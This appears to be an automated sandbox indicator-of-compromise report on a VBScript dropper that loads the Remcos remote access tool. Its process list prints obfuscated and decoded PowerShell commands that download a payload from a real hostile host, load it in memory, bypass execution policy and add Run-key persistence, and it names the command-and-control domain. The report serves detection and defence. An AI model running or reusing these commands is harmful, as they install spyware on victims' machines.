IOC Report
sostener.vbs

loading gif

Files

File Path
Type
Category
Malicious
sostener.vbs
Unicode text, UTF-16, little-endian text, with CRLF line terminators
initial sample
malicious
C:\ProgramData\remcos\logs.dat
data
dropped
malicious
C:\Users\user\AppData\Local\Temp\sostener.vbs
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Local\Temp\sostener.vbs:Zone.Identifier
ASCII text, with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Local\Temp\xx1.ps1
ASCII text, with no line terminators
dropped
malicious
C:\Users\user\AppData\Local\Temp\xx2.vbs
ASCII text, with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\json[1].json
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
modified
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0tidacm4.zpe.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_15mipq2n.gkf.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1jh1qeit.h2y.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1owxtdep.dvi.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1xfjnky4.y2i.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2fkrqk5e.gr4.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3m3qld52.azy.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4y5wi1go.v5n.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5azf1hna.s1i.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5lscxdeq.sec.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_alyyas5a.uto.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_b0tr5l43.acd.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_b54ungvz.fqw.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bbe3en2g.hpi.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_biwkrxkp.c4x.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_c5pjfiyp.5xi.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fagm5ipp.5cr.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gq30w00h.b3z.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_imq5g0pq.hhd.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jc0v5ugi.tpd.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l44brpxj.3di.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lvdtgqkm.54d.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_m0osc13k.imw.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_m2hlp5r1.kve.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_npbstxtj.cgq.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_otuxuszo.00z.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oxop0tqe.x3s.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pyhyjbwx.k3o.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qmfyzqut.zxa.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rcroe1lr.4lx.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_s0cegv2o.hm1.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sjvepcxu.vfo.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tdnosrkf.l1v.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tdqjoos4.kjc.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tfprz31m.jnj.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tzn3mnah.m2e.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wbzzq4en.vsj.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wudfb3wh.eun.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_x0limvup.bn3.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xr0nzqwr.033.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xzajo4ck.a4q.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ycgpqw3e.3ld.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yvconnxd.ft0.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ziigamrt.ojs.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zv0m5ily.2vy.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zzwnqnqy.rly.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF57b4b2.TMP (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\CET0BENF6MBIOKFMXJA3.temp
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\NIYB5O5YSJK0Z4IHZ95W.temp
data
dropped
There are 49 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Windows\System32\wscript.exe
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\sostener.vbs"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = 'J Bi Gk awB5 Gc I 9 C Jw w DE Mw n Ds J Br G4 dwBt Hg I 9 C Jw l H egBB GM TwBn Ek bgBN HI JQ n Ds WwBC Hk d Bl Fs XQBd C J Bu HU c Bj HM I 9 C WwBz Hk cwB0 GU bQ u EM bwBu HY ZQBy HQ XQ 6 Do RgBy G8 bQBC GE cwBl DY N BT HQ cgBp G4 Zw o C K BO GU dw t E8 YgBq GU YwB0 C TgBl HQ LgBX GU YgBD Gw aQBl G4 d p C4 R Bv Hc bgBs G8 YQBk FM d By Gk bgBn Cg JwBo HQ d Bw HM Og v C8 dwB3 Hc LgBp G4 ZgBv HI bQBh GM aQBv G4 bwBw G8 cgB0 HU bgBh C4 YwBv G0 LwB3 H LQBj G8 bgB0 GU bgB0 C8 dQBw Gw bwBh GQ cw v DI M y DQ Lw w Dk LwBk Gw b Bz Gs eQBm GE b u HQ e B0 Cc KQ p Ds WwBz Hk cwB0 GU bQ u EE c Bw EQ bwBt GE aQBu F0 Og 6 EM dQBy HI ZQBu HQ R Bv G0 YQBp G4 LgBM G8 YQBk Cg J Bu HU c Bj HM KQ u Ec ZQB0 FQ eQBw GU K n EM b Bh HM cwBM Gk YgBy GE cgB5 DE LgBD Gw YQBz HM MQ n Ck LgBH GU d BN GU d Bo G8 Z o Cc WgB4 Es S BH Cc KQ u Ek bgB2 G8 awBl Cg J Bu HU b Bs Cw I Bb G8 YgBq GU YwB0 Fs XQBd C K n HQ e B0 C4 cwBv GM bQBl HI Lw 3 D Lw 0 DI M y C8 cwBk GE bwBs H dQ v HQ bgBl HQ bgBv GM LQBw Hc LwBt G8 Yw u GE bgB1 HQ cgBv H bwBu G8 aQBj GE bQBy G8 ZgBu Gk LgB3 Hc dw v C8 OgBz H d B0 Gg Jw g Cw I k Gs bgB3 G0 e g Cw I n F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 Xw t C0 LQ t C0 LQ t C0 LQ t C0 LQ t Cc L g CQ YgBp Gs eQBn Cw I n DE Jw s C JwBS G8 Z Bh Cc I p Ck Ow =';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace(' ','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\Desktop\sostener.vbs');powershell $KByHL;
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$bikyg = '013';$knwmx = 'C:\Users\user\Desktop\sostener.vbs';[Byte[]] $nupcs = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('https://www.informacionoportuna.com/wp-content/uploads/2024/09/dllskyfal.txt'));[system.AppDomain]::CurrentDomain.Load($nupcs).GetType('ClassLibrary1.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('txt.socmer/70/4202/sdaolpu/tnetnoc-pw/moc.anutroponoicamrofni.www//:sptth' , $knwmx , '_______________________-------------', $bikyg, '1', 'Roda' ));"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Set-ExecutionPolicy Bypass -Scope Process ; powershell -file C:\Users\user\AppData\Local\Temp\xx1.ps1
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Copy-Item 'C:\Users\user\Desktop\sostener.vbs' -Destination 'C:\Users\user\AppData\Local\Temp\'
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Copy-Item 'C:\Users\user\Desktop\sostener.vbs' -Destination 'C:\Users\user\AppData\Local\Temp\'
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -file C:\Users\user\AppData\Local\Temp\xx1.ps1
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -WindowStyle hidden "& 'C:\Users\user\AppData\Local\Temp\xx2.vbs' "
malicious
C:\Windows\System32\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\xx2.vbs"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -command wscript.exe //b //nologo 'C:\Users\user\AppData\Local\Temp\sostener.vbs'
malicious
C:\Windows\System32\wscript.exe
"C:\Windows\system32\wscript.exe" //b //nologo C:\Users\user\AppData\Local\Temp\sostener.vbs
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = 'J Bi Gk awB5 Gc I 9 C Jw w DE Mw n Ds J Br G4 dwBt Hg I 9 C Jw l H egBB GM TwBn Ek bgBN HI JQ n Ds WwBC Hk d Bl Fs XQBd C J Bu HU c Bj HM I 9 C WwBz Hk cwB0 GU bQ u EM bwBu HY ZQBy HQ XQ 6 Do RgBy G8 bQBC GE cwBl DY N BT HQ cgBp G4 Zw o C K BO GU dw t E8 YgBq GU YwB0 C TgBl HQ LgBX GU YgBD Gw aQBl G4 d p C4 R Bv Hc bgBs G8 YQBk FM d By Gk bgBn Cg JwBo HQ d Bw HM Og v C8 dwB3 Hc LgBp G4 ZgBv HI bQBh GM aQBv G4 bwBw G8 cgB0 HU bgBh C4 YwBv G0 LwB3 H LQBj G8 bgB0 GU bgB0 C8 dQBw Gw bwBh GQ cw v DI M y DQ Lw w Dk LwBk Gw b Bz Gs eQBm GE b u HQ e B0 Cc KQ p Ds WwBz Hk cwB0 GU bQ u EE c Bw EQ bwBt GE aQBu F0 Og 6 EM dQBy HI ZQBu HQ R Bv G0 YQBp G4 LgBM G8 YQBk Cg J Bu HU c Bj HM KQ u Ec ZQB0 FQ eQBw GU K n EM b Bh HM cwBM Gk YgBy GE cgB5 DE LgBD Gw YQBz HM MQ n Ck LgBH GU d BN GU d Bo G8 Z o Cc WgB4 Es S BH Cc KQ u Ek bgB2 G8 awBl Cg J Bu HU b Bs Cw I Bb G8 YgBq GU YwB0 Fs XQBd C K n HQ e B0 C4 cwBv GM bQBl HI Lw 3 D Lw 0 DI M y C8 cwBk GE bwBs H dQ v HQ bgBl HQ bgBv GM LQBw Hc LwBt G8 Yw u GE bgB1 HQ cgBv H bwBu G8 aQBj GE bQBy G8 ZgBu Gk LgB3 Hc dw v C8 OgBz H d B0 Gg Jw g Cw I k Gs bgB3 G0 e g Cw I n F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 Xw t C0 LQ t C0 LQ t C0 LQ t C0 LQ t Cc L g CQ YgBp Gs eQBn Cw I n DE Jw s C JwBS G8 Z Bh Cc I p Ck Ow =';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace(' ','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\AppData\Local\Temp\sostener.vbs');powershell $KByHL;
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$bikyg = '013';$knwmx = 'C:\Users\user\AppData\Local\Temp\sostener.vbs';[Byte[]] $nupcs = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('https://www.informacionoportuna.com/wp-content/uploads/2024/09/dllskyfal.txt'));[system.AppDomain]::CurrentDomain.Load($nupcs).GetType('ClassLibrary1.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('txt.socmer/70/4202/sdaolpu/tnetnoc-pw/moc.anutroponoicamrofni.www//:sptth' , $knwmx , '_______________________-------------', $bikyg, '1', 'Roda' ));"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Set-ExecutionPolicy Bypass -Scope Process ; powershell -file C:\Users\user\AppData\Local\Temp\xx1.ps1
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Copy-Item 'C:\Users\user\AppData\Local\Temp\sostener.vbs' -Destination 'C:\Users\user\AppData\Local\Temp\'
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Copy-Item 'C:\Users\user\AppData\Local\Temp\sostener.vbs' -Destination 'C:\Users\user\AppData\Local\Temp\'
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -file C:\Users\user\AppData\Local\Temp\xx1.ps1
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -WindowStyle hidden "& 'C:\Users\user\AppData\Local\Temp\xx2.vbs' "
malicious
C:\Windows\System32\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\xx2.vbs"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -command wscript.exe //b //nologo 'C:\Users\user\AppData\Local\Temp\sostener.vbs'
malicious
C:\Windows\System32\wscript.exe
"C:\Windows\system32\wscript.exe" //b //nologo C:\Users\user\AppData\Local\Temp\sostener.vbs
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = 'J Bi Gk awB5 Gc I 9 C Jw w DE Mw n Ds J Br G4 dwBt Hg I 9 C Jw l H egBB GM TwBn Ek bgBN HI JQ n Ds WwBC Hk d Bl Fs XQBd C J Bu HU c Bj HM I 9 C WwBz Hk cwB0 GU bQ u EM bwBu HY ZQBy HQ XQ 6 Do RgBy G8 bQBC GE cwBl DY N BT HQ cgBp G4 Zw o C K BO GU dw t E8 YgBq GU YwB0 C TgBl HQ LgBX GU YgBD Gw aQBl G4 d p C4 R Bv Hc bgBs G8 YQBk FM d By Gk bgBn Cg JwBo HQ d Bw HM Og v C8 dwB3 Hc LgBp G4 ZgBv HI bQBh GM aQBv G4 bwBw G8 cgB0 HU bgBh C4 YwBv G0 LwB3 H LQBj G8 bgB0 GU bgB0 C8 dQBw Gw bwBh GQ cw v DI M y DQ Lw w Dk LwBk Gw b Bz Gs eQBm GE b u HQ e B0 Cc KQ p Ds WwBz Hk cwB0 GU bQ u EE c Bw EQ bwBt GE aQBu F0 Og 6 EM dQBy HI ZQBu HQ R Bv G0 YQBp G4 LgBM G8 YQBk Cg J Bu HU c Bj HM KQ u Ec ZQB0 FQ eQBw GU K n EM b Bh HM cwBM Gk YgBy GE cgB5 DE LgBD Gw YQBz HM MQ n Ck LgBH GU d BN GU d Bo G8 Z o Cc WgB4 Es S BH Cc KQ u Ek bgB2 G8 awBl Cg J Bu HU b Bs Cw I Bb G8 YgBq GU YwB0 Fs XQBd C K n HQ e B0 C4 cwBv GM bQBl HI Lw 3 D Lw 0 DI M y C8 cwBk GE bwBs H dQ v HQ bgBl HQ bgBv GM LQBw Hc LwBt G8 Yw u GE bgB1 HQ cgBv H bwBu G8 aQBj GE bQBy G8 ZgBu Gk LgB3 Hc dw v C8 OgBz H d B0 Gg Jw g Cw I k Gs bgB3 G0 e g Cw I n F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 Xw t C0 LQ t C0 LQ t C0 LQ t C0 LQ t Cc L g CQ YgBp Gs eQBn Cw I n DE Jw s C JwBS G8 Z Bh Cc I p Ck Ow =';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace(' ','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\AppData\Local\Temp\sostener.vbs');powershell $KByHL;
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$bikyg = '013';$knwmx = 'C:\Users\user\AppData\Local\Temp\sostener.vbs';[Byte[]] $nupcs = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('https://www.informacionoportuna.com/wp-content/uploads/2024/09/dllskyfal.txt'));[system.AppDomain]::CurrentDomain.Load($nupcs).GetType('ClassLibrary1.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('txt.socmer/70/4202/sdaolpu/tnetnoc-pw/moc.anutroponoicamrofni.www//:sptth' , $knwmx , '_______________________-------------', $bikyg, '1', 'Roda' ));"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Set-ExecutionPolicy Bypass -Scope Process ; powershell -file C:\Users\user\AppData\Local\Temp\xx1.ps1
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Copy-Item 'C:\Users\user\AppData\Local\Temp\sostener.vbs' -Destination 'C:\Users\user\AppData\Local\Temp\'
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Copy-Item 'C:\Users\user\AppData\Local\Temp\sostener.vbs' -Destination 'C:\Users\user\AppData\Local\Temp\'
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -file C:\Users\user\AppData\Local\Temp\xx1.ps1
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
There are 29 hidden processes, click here to show them.

URLs

Name
IP
Malicious
https://www.informacionoportuna.com/wp-content/uploads/2024/09/dllskyfal.txt
15.235.85.194
malicious
https://www.informacionoportuna.com/wp-content/uploads/2024/07/remcos.txt
15.235.85.194
malicious
https://www.informacionoportuna.com/wp-content/uploads/2024/
unknown
malicious
https://www.informacionoportuna.com
unknown
malicious
special2023.duckdns.org
malicious
https://www.informacionoportuna.com/wp-content/uploads/2024/09/pesky.txt
15.235.85.194
malicious
HTTPS://WWW.INFORMACIONOPORTUNA.COM/WP-CONTENT/UPLOADS/2024/07/REMCOS.TXT
unknown
http://nuget.org/NuGet.exe
unknown
http://www.apache.org/licenses/LICENSE-2.0
unknown
http://pesterbdd.com/images/Pester.png
unknown
http://geoplugin.net/json.gpl
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://go.micro
unknown
http://informacionoportuna.com
unknown
https://contoso.com/License
unknown
https://contoso.com/Icon
unknown
https://aka.ms/pscore6
unknown
http://www.informacionoportuna.com
unknown
https://www.informacionoportuna.com/wp-content/uploads/2024/07/r
unknown
https://github.com/Pester/Pester
unknown
http://geoplugin.net/json.gpSystem32
unknown
http://geoplugin.net/json.gp
178.237.33.50
http://crl.m
unknown
http://geoplugin.net/json.gp/C
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://oneget.orgX
unknown
https://aka.ms/pscore68
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
http://crl.v
unknown
https://oneget.org
unknown
There are 21 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
informacionoportuna.com
15.235.85.194
malicious
comandoespecial2023.duckdns.org
173.208.241.155
malicious
www.informacionoportuna.com
unknown
malicious
geoplugin.net
178.237.33.50

IPs

IP
Domain
Country
Malicious
15.235.85.194
informacionoportuna.com
United States
malicious
173.208.241.155
comandoespecial2023.duckdns.org
United States
malicious
178.237.33.50
geoplugin.net
Netherlands

Registry

Path
Value
Malicious
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
_______________________-------------
malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
HKEY_CURRENT_USER\SOFTWARE\Rmc-3PWW8O
exepath
HKEY_CURRENT_USER\SOFTWARE\Rmc-3PWW8O
licence
HKEY_CURRENT_USER\SOFTWARE\Rmc-3PWW8O
time
There are 8 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
677000
heap
page read and write
malicious
29B2A4A0000
trusted library allocation
page read and write
malicious
29B2A788000
trusted library allocation
page read and write
malicious
23A4A8EC000
trusted library allocation
page read and write
malicious
29B32A20000
trusted library section
page read and write
malicious
1B9A399D000
trusted library allocation
page read and write
malicious
2DEF000
stack
page read and write
malicious
1217000
heap
page read and write
malicious
967000
heap
page read and write
malicious
400000
remote allocation
page execute and read and write
malicious
7FFD9BA80000
trusted library allocation
page read and write
1B9943D2000
trusted library allocation
page read and write
29B1BAA4000
trusted library allocation
page read and write
1B9ABFB0000
heap
page read and write
7FFD9BA00000
trusted library allocation
page read and write
29B1A300000
trusted library allocation
page read and write
7FFD9B7A0000
trusted library allocation
page read and write
1C29A95B000
heap
page read and write
20FEA060000
heap
page read and write
7FFD9B990000
trusted library allocation
page read and write
155ACCB7000
trusted library allocation
page read and write
7FFD9B902000
trusted library allocation
page read and write
1EA4F011000
trusted library allocation
page read and write
120A6C1A000
heap
page read and write
7FFD9B9D0000
trusted library allocation
page read and write
24E81BA2000
trusted library allocation
page read and write
595187E000
stack
page read and write
53E17FF000
stack
page read and write
53E0FFF000
stack
page read and write
1B991CCD000
heap
page read and write
2905D600000
heap
page readonly
7FFD9BA20000
trusted library allocation
page read and write
24E8200D000
trusted library allocation
page read and write
3CAF000
stack
page read and write
7FFD9BA50000
trusted library allocation
page read and write
7FFD9BA20000
trusted library allocation
page read and write
1EA3D19E000
heap
page read and write
1208E7B0000
trusted library allocation
page read and write
29B32973000
heap
page read and write
7FFD9B846000
trusted library allocation
page execute and read and write
29B1A850000
trusted library allocation
page read and write
23A3AD38000
trusted library allocation
page read and write
7FFD9B91A000
trusted library allocation
page read and write
29B1A420000
heap
page execute and read and write
7FFD9BA70000
trusted library allocation
page read and write
29B1BD50000
trusted library allocation
page read and write
2CEE000
stack
page read and write
2102F2ED000
trusted library allocation
page read and write
7FFD9BA80000
trusted library allocation
page read and write
10C5000
heap
page read and write
24E99D60000
heap
page read and write
7FFD9B890000
trusted library allocation
page execute and read and write
E093878000
stack
page read and write
7FFD9B810000
trusted library allocation
page read and write
1208E88F000
trusted library allocation
page read and write
7FFD9B850000
trusted library allocation
page execute and read and write
5B0F7FE000
stack
page read and write
16891E50000
heap
page read and write
7FFD9B81C000
trusted library allocation
page execute and read and write
5B0000
heap
page read and write
D22B5F8000
stack
page read and write
7FFD9B752000
trusted library allocation
page read and write
24EFFB10000
heap
page read and write
7FFD9B840000
trusted library allocation
page execute and read and write
24099901000
heap
page read and write
7FFD9B960000
trusted library allocation
page read and write
7DF4483D0000
trusted library allocation
page execute and read and write
7FFD9B9C0000
trusted library allocation
page read and write
23A3ACDF000
trusted library allocation
page read and write
1EA3D1C0000
heap
page read and write
1EA3D208000
heap
page read and write
1EA3D1C4000
heap
page read and write
2905D550000
heap
page read and write
C7B5B9000
stack
page read and write
1C2808D9000
heap
page read and write
7FFD9B78D000
trusted library allocation
page execute and read and write
7FFD9B76B000
trusted library allocation
page read and write
24E82016000
trusted library allocation
page read and write
7FFD9BAB0000
trusted library allocation
page read and write
16E6D998000
heap
page read and write
1EA4EFA1000
trusted library allocation
page read and write
7FFD9B931000
trusted library allocation
